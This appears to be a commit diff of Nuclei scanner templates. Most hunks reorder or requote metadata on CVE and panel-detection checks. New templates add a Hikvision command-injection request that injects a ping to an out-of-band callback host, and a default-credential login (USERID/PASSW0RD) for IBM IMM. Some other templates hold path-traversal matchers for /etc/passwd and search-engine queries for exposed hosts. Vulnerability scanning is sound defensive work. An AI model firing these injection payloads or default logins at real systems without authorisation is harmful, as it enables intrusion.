epss-score: 0.15138
epss-percentile: 0.95348
epss-percentile: 0.95663
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
metadata:
max-request: 1
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950

View File

@ -6,28 +6,29 @@ info:
severity: critical
description: |
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
reference:
- https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/gift-voucher/
- https://github.com/ARPSyndicate/cvemon
- https://github.com/JoshuaMart/JoshuaMart
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-28662
cwe-id: CWE-89
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
epss-score: 0.00076
epss-percentile: 0.31593
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
metadata:
vendor: codemenschen
product: gift_vouchers
product: "gift_vouchers"
framework: wordpress
fofa-query: body="/wp-content/plugins/gift-voucher/"
fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
max-request: 2
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
flow: http(1) && http(2)
@ -59,4 +60,4 @@ http:
- status_code == 500
- contains(body, 'critical error')
condition: and
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950

View File

@ -13,13 +13,14 @@ info:
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
- https://github.com/mayur-esh/vuln-liners
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-32563
cwe-id: CWE-22
epss-score: 0.43261
epss-percentile: 0.97013
epss-score: 0.42647
epss-percentile: 0.97218
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -56,4 +57,4 @@ http:
part: body_2
words:
- "CVE-2023-32563"
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950

View File

@ -6,14 +6,14 @@ info:
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
metadata:
verified: true
max-request: 1
max-request: 2
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,xxe,opencms
http:
@ -36,4 +36,4 @@ http:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
# digest: 4a0a00473045022100927a1bd7a3c4f8af7b6989155be518f1259a6cdd15ba59dad7785280d7c5ec9702203e99452c03ab5e09e1ef1627473fb5a1ebe79a654ad369b1e2190145c98e9b32:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950

View File

@ -16,8 +16,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
shodan-query: html:"welcome.cgi?p=logo"
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 2
tags: cve,cve2023,kev,auth-bypass,ivanti
http:
@ -48,4 +49,4 @@ http:
- 'contains(body_2, "block_message")'
- 'contains(header_2, "application/json")'
condition: and
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950

View File

@ -14,14 +14,15 @@ info:
cvss-score: 5.4
cve-id: CVE-2023-52085
cwe-id: CWE-22
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12483
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
metadata:
vendor: wintercms
product: winter
shodan-query: title:"Winter CMS"
fofa-query: title="Winter CMS"
shodan-query: "title:\"Winter CMS\""
fofa-query: "title=\"Winter CMS\""
max-request: 4
tags: cve,cve2023,authenticated,lfi,wintercms
http:
@ -68,4 +69,4 @@ http:
regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950

View File

@ -6,25 +6,26 @@ info:
severity: high
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
remediation: |
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-6831
cwe-id: CWE-22
epss-score: 0.000460000
epss-percentile: 0.126930000
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.12693
metadata:
verified: true
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
shodan-query: "http.title:\"mlflow\""
max-request: 2
verified: true
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
http:
@ -58,4 +59,4 @@ http:
- type: status
status:
- 500
# digest: 490a0046304402202e05b1ca433f0cc3ad8178fa3db634d613c180a5d76bd1907daf5a29b102f02f0220546c974febbb5121e3697cfc1e76620c450e31cee055c94cd0b25375648e38ba:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,56 @@
id: CVE-2023-6895
info:
name: Hikvision Intercom Broadcasting System - Command Execution
author: archer
severity: critical
description: |
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
reference:
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
- https://vuldb.com/?ctiid.248254
- https://vuldb.com/?id.248254
- https://github.com/Marco-zcl/POC
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6895
cwe-id: CWE-78
epss-score: 0.0008
epss-percentile: 0.32716
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hikvision
product: intercom_broadcast_system
fofa-query: icon_hash="-1830859634"
tags: cve,cve2023,rce,hikvision
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "TTL="
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

View File

@ -6,24 +6,25 @@ info:
severity: critical
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
reference:
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cve-id: CVE-2023-6909
cwe-id: CWE-29
metadata:
max-request: 5
verified: true
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
shodan-query: "http.title:\"mlflow\""
tags: cve,cve2023,mlflow,lfi
http:
@ -90,4 +91,4 @@ http:
json:
- '.run.info.run_id'
internal: true
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950

View File

@ -15,14 +15,15 @@ info:
cvss-score: 8.8
cve-id: CVE-2024-0713
cwe-id: CWE-434
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
epss-score: 0.00061
epss-percentile: 0.2356
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
metadata:
vendor: monitorr
product: monitorr
verified: true
fofa-query: icon_hash="-211006074"
fofa-query: "icon_hash=\"-211006074\""
max-request: 2
tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
@ -66,4 +67,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502200e99cf7ecbba3a0c88653fc454cb5715d7085e0678ab470e4b7cfbf4dd198e8d022100e47a621b93eaabb8881e48cae80b9cc8c0596a437fc9b8ac0921a63beee74506:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950

View File

@ -6,17 +6,17 @@ info:
severity: medium
description: |
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
remediation: |
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
metadata:
max-request: 1
max-request: 2
verified: true
fofa-query: icon_hash="871154672"
fofa-query: "icon_hash=\"871154672\""
tags: cve2024,cve,rebuild,ssrf
http:
@ -32,4 +32,4 @@ http:
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a004730450220098225bea96b8668687e7dfe13e7567202130b05bf6e23cffcc70cb83386d700022100f078d24ac95ac54515557e84e1bc60404c9d6d59cfa0604f82e5d03baaf841e6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950

View File

@ -6,14 +6,14 @@ info:
severity: high
description: |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
reference:
- https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
@ -21,7 +21,8 @@ info:
cwe-id: CWE-89
metadata:
verified: true
fofa-query: '"wordpress" && body="html5-video-player"'
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
max-request: 1
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
http:
@ -36,4 +37,4 @@ http:
- 'contains(header, "application/json")'
- 'contains_all(body, "created_at", "video_id")'
condition: and
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950

View File

@ -6,25 +6,26 @@ info:
severity: medium
description: |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
reference:
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645
- https://github.com/fkie-cad/nvd-json-data-feeds
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2024-21645
cwe-id: CWE-74
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
epss-score: 0.00046
epss-percentile: 0.13723
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: pyload
product: pyload
shodan-query: title:"pyload"
shodan-query: "title:\"pyload\""
max-request: 2
tags: cve,cve2024,pyload,authenticated,injection
variables:
@ -59,4 +60,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950

View File

@ -18,8 +18,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
vendor: ivanti
product: connect_secure
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 1
tags: cve,cve2024,kev,ssrf,ivanti
http:
@ -43,4 +44,4 @@ http:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950

View File

@ -8,7 +8,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.0.1?topic=users-tutorial-getting-started-decision-center-business-console
metadata:
verified: true
shodan-query: title="Decision Center | Business Console"
shodan-query: "title=\"Decision Center | Business Console\""
max-request: 1
tags: ibm,default-login,decision-center
http:
@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502205523a863445a05acb27e5d7ae6cb824465b467afcd5bf3f7f916c78ff4853b54022100f6e82a4f9f222831b97dcb7bf5d0a3410048123eface5f0840f9571b5c31ac2d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022016a80ca652cc1c45b3f6d4c92fce061f9fc9d9cb8d9cfe96626d34be23038086022100bc041f5982bff0cd5c6c76e96a375e3be9dcfdd433a205870a938cc378c23418:922c64590222798bb761d5b6d8e72950

View File

@ -8,7 +8,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise
metadata:
verified: true
shodan-query: html="Decision Center Enterprise console"
shodan-query: "html=\"Decision Center Enterprise console\""
max-request: 1
tags: ibm,default-login,decision-center
http:
@ -42,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100f49bccdf778836b24be61c1c569daa47361ed0b8f9f3b1832055b5bc2a007f1502206ce043ef3f1813f97d2ff4376fadf94112238eed01bfb77c3d404179a8b760b4:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100eda449ebab75e6434f62e1e6ad214e7a3a4cbc01f47209e6f2367427fc73892f02202b8e060110bc0d3aed5fc0e773daa6416705f332e863b1f851a004b1364615be:922c64590222798bb761d5b6d8e72950

View File

@ -8,7 +8,8 @@ info:
- https://www.ibm.com/docs/en/odm/8.8.0?topic=center-overview-decision
metadata:
verified: true
shodan-query: title:"Rule Execution Server"
shodan-query: "title:\"Rule Execution Server\""
max-request: 1
tags: ibm,default-login,decision-server
http:
@ -43,4 +44,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100e2da7214e13a57c4441de262e1f4377d8decac405644528c512f6298514f47ac022100f1ac476ef1244aed60da4511ef21547cb5d7cbd6238124f45f040fadc6796b39:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220196e8fb1a9ddef98855c38f2719f3c5405d7c51e90772f82c6d35c0d7596cc06022100cc5faf04711e248eb7c4c8b2fd597c8346977de7602568861691790ec7a56b1b:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,44 @@
id: imm-default-login
info:
name: Integrated Management Module - Default Login
author: jpg0mez
severity: high
description: |
Integrated Management Module default login credentials were discovered.
reference:
- https://pubs.lenovo.com/x3650-m4/t_logging_web_interface
- https://www.ibm.com/docs/en/tcs-service?topic=oip-logging-imm-web-interface
classification:
cwe-id: CWE-798
metadata:
verified: true
max-request: 1
fofa-query: "integrated management module"
shodan-query: html:"ibmdojo"
tags: imm,ibm,default-login
http:
- method: POST
path:
- "{{BaseURL}}/data/login"
body: "user=USERID&password=PASSW0RD"
redirects: true
matchers-condition: and
matchers:
- type: word
words:
- "<authResult>0</authResult>"
- 'authResult":"0'
condition: or
- type: word
words:
- "index-console.php"
- "home.php"
condition: and
- type: status
status:
- 200

View File

@ -7,8 +7,9 @@ info:
reference:
- https://documentation.softwareag.com/
metadata:
shodan-query: "http.favicon.hash:-234335289"
max-request: 5
verified: true
shodan-query: http.favicon.hash:-234335289
tags: default-login,webmethod
flow: http(1) && http(2)
@ -63,4 +64,4 @@ http:
- Invalid credentials
negative: true
condition: and
# digest: 4a0a00473045022100c2ff9832495b567326f60a3290cab01226778deef5fb3b3cc77288024507dce7022035ca48f6387403fbaccecdec948c4473ce0e90f135fc8b17cc5c3c28c8d54d70:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220115d89c488b0862bb1273fe0b0298087afa5b74b011991ae1cebba5921795590022100a3bbc39dba847eadccd27ed89d597a41e3a4508393fae04c9c017f35f0b9db36:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,37 @@
id: cisco-unity-panel
info:
name: Cisco Unity Connection Panel - Detect
author: HeeresS
severity: info
description: |
A Cisco Unity Connection instance was detected.
metadata:
shodan-query: "html:\"Cisco Unity Connection\""
max-request: 2
verified: true
tags: panel,cisco,unity,login,detect
http:
- method: GET
path:
- "{{BaseURL}}/cuadmin/home.do"
- "{{BaseURL}}"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Cisco Unity Connection Administration"
- ">Cisco Unity Connection</a>"
condition: or
- type: status
status:
- 200
# digest: 490a00463044022022e561912a02fb0baa91f246eebc3a05855972f2bab1224383889c1dfc20e20b02201a6bfd866f1ed3a945fb0c8a615a7b41244c13f0286921c37b72d89b08e95e70:922c64590222798bb761d5b6d8e72950

View File

@ -11,10 +11,9 @@ info:
- https://dockge.kuma.pet/
metadata:
verified: true
max-request: 2
shodan-query: title:"Dockge"
max-request: 1
shodan-query: "title:\"Dockge\""
tags: panel,dockge,login
http:
- method: GET
path:
@ -32,4 +31,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402207b4b31e89b41d54ec47a046fbbfcff3b303e68aff67845ca51b890588d9c2f180220712c5d5677eb71010f6ec9f123f1f4a074bc531998dba39a0c8a287a7e5cf40d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502204b3172c4c1a24716f7a36595e882653be64ea2699acebc7150c9bb87487c4b7302210091e20d9ea7ba962951c9bd8836bb065e490b7c99eda7f2b34b8209c155ebd94b:922c64590222798bb761d5b6d8e72950

View File

@ -5,12 +5,13 @@ info:
author: righettod
severity: info
description: |
EasyJOB login panel was detected.
EasyJOB login panel was detected.
reference:
- https://www.en.because-software.com/software/easyjob/
metadata:
verified: true
shodan-query: http.title:"Log in - easyJOB"
shodan-query: "http.title:\"Log in - easyJOB\""
max-request: 1
tags: panel,easyjob,login
http:
@ -31,4 +32,4 @@ http:
group: 1
regex:
- 'easyJOB\s+([0-9.]+)'
# digest: 4a0a004730450220411982e48718601305b05a93c91be6a680ce993e5e110400b0dabbff753fe0bb02210091af5cbecc2fd766de347dad93c4a3e105a0d3f5a4a8f7a002bdb838c3bc2fad:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f82e7fbb4c360cb536e24b99b8f65c91e8d46ebbc0f45a156d6074c154e202a402203334ffeaa0ca0e92f85d5ddcfd516f44ec9fbc55655b5351d2e193726e2b2248:922c64590222798bb761d5b6d8e72950

View File

@ -7,12 +7,11 @@ info:
description: GoAnywhere Managed File Transfer login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
metadata:
shodan-query: "http.html:\"GoAnywhere Managed File Transfer\""
verified: true
max-request: 1
shodan-query: http.html:"GoAnywhere Managed File Transfer"
max-request: 2
tags: panel,goanywhere,login,filetransfer
http:
@ -35,4 +34,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100947f00fcac2bdcc793453ed15706359afde89947675258107183adb0f5b622f7022100e9295654f6ab5e2e2c8f63f28b7e99923b92cca82532de2b9314927aecaf52c6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206418902cc87923995e4a87a3036d1a138bae03cb012fde34e44df55ce4504dac022100cac92b3dee719aff4f1d10544579c719236bf9dca63006ef5e0e0741aee209b2:922c64590222798bb761d5b6d8e72950

View File

@ -11,7 +11,8 @@ info:
vendor: gotify
product: server
verified: true
shodan-query: http.title:"Gotify"
shodan-query: "http.title:\"Gotify\""
max-request: 1
tags: panel,gotify,login,detect
http:
@ -32,4 +33,4 @@ http:
group: 1
regex:
- '"version":"([0-9.]+)"'
# digest: 4b0a00483046022100c306600c5a3f75ebdbc6d89aeb4a9042c616f870d869819424686889a568b7880221008c14b6498f5d7f935e09fe01a8f4bda2c761f2692a59202766cb798135336ae9:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204ed0fc61c5fdaec5869843788c59849c687bfe8b39891df7eab06b029e516749022055341de709d14d202015b389e25139b06ed1398ab952f6a2a39cd2ecf6a343de:922c64590222798bb761d5b6d8e72950

View File

@ -13,9 +13,9 @@ info:
cvss-score: 5.3
cwe-id: CWE-200
metadata:
max-request: 2
vendor: grails
product: grails
max-request: 2
tags: grails,panel
http:
@ -34,4 +34,4 @@ http:
words:
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
negative: true
# digest: 4a0a0047304502204ea638d90bf728298450d4bf071d113ae80087d4e5001d971617212faf1e375c022100dac85d19d2f65956875f904ce9e025a55c229cae307af3e03fa7708c190b8ef6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f7857a61a4ccdef275c890a466396f0aef331e21c33e1ab4e86f6cd2c4f3c4a4022025d9b94b715dc2b8c625ba3a8111008a7f2039dd829d7b2bef2414ba73e51ced:922c64590222798bb761d5b6d8e72950

View File

@ -9,7 +9,8 @@ info:
- https://www.haivision.com/
metadata:
verified: true
shodan-query: http.title:"Haivision Gateway"
shodan-query: "http.title:\"Haivision Gateway\""
max-request: 1
tags: panel,haivision,login,detect
http:
@ -23,4 +24,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>Haivision Gateway", "content=\"Haivision Gateway")'
condition: and
# digest: 4b0a0048304602210086238eba9398bb797b00f86ef36db758f4962c0d8247070cf8b2554bdbc4b649022100c49ebd06f35893af713c00909b8f98abbae0f3ab6230d799ad0acf6147196e68:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200b774f9123ccefe48635e129de64e264ee5b5b5882a63118c8e59935903bd895022057bd039a93248ba6b03b8c1078549b1e74b89f06fef7cc311d719dc909801370:922c64590222798bb761d5b6d8e72950

View File

@ -9,9 +9,9 @@ info:
- https://www.haivision.com/
metadata:
verified: true
shodan-query: http.title:"Haivision Media Platform"
shodan-query: "http.title:\"Haivision Media Platform\""
max-request: 1
tags: panel,haivision,login,detect
http:
- method: GET
path:
@ -23,4 +23,4 @@ http:
- 'status_code == 200'
- 'contains_any(body, "<title>Haivision Media Platform", "content=\"Haivision Network Video")'
condition: and
# digest: 4a0a00473045022100852a82de658ce3156eed4bb9e4faf88dd4e709f258d2f188cd2aaa6f07d6e85a022079da3770440c2b448ce933600e28d1644f9a9747c3008c9e3b7f2d1f978f9e98:922c64590222798bb761d5b6d8e72950
